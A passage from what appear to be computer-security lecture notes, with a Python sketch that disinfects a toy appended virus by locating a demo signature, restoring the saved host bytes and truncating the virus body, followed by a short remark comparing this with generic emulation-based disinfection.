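MARKER = b"DEMOVIRUS"   # hypothetical signature that locates the virus body
SAVED_LEN = 3           # hypothetical: the virus overwrote the first 3 host bytes


def disinfect(infected: bytes) -> bytes:
    """Restore the saved host beginning and truncate the appended virus body."""
    start = infected.rfind(MARKER)
    if start == -1:
        return infected                      # no known virus found: leave as is
    saved_at = start + len(MARKER)
    original_head = infected[saved_at:saved_at + SAVED_LEN]
    if len(original_head) < SAVED_LEN:
        raise ValueError("saved host bytes are truncated; cannot disinfect")
    # Move the original code back to the beginning, drop everything from the marker on.
    return original_head + infected[SAVED_LEN:start]


host = bytes.fromhex("b435b021cd21") + b"rest of the host program"
infected = (b"\xe9\x00\x10"                  # jump planted over the first 3 bytes
            + host[SAVED_LEN:]
            + MARKER + host[:SAVED_LEN] + b"...virus code...")

print(disinfect(infected) == host)
```

The sketch depends on knowing exactly where the virus keeps the saved bytes, which is why the slide calls this approach specialized to each virus and why generic disinfection instead lets the emulated virus restore the host itself.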

  • Next time
    - Worms (and maybe bots)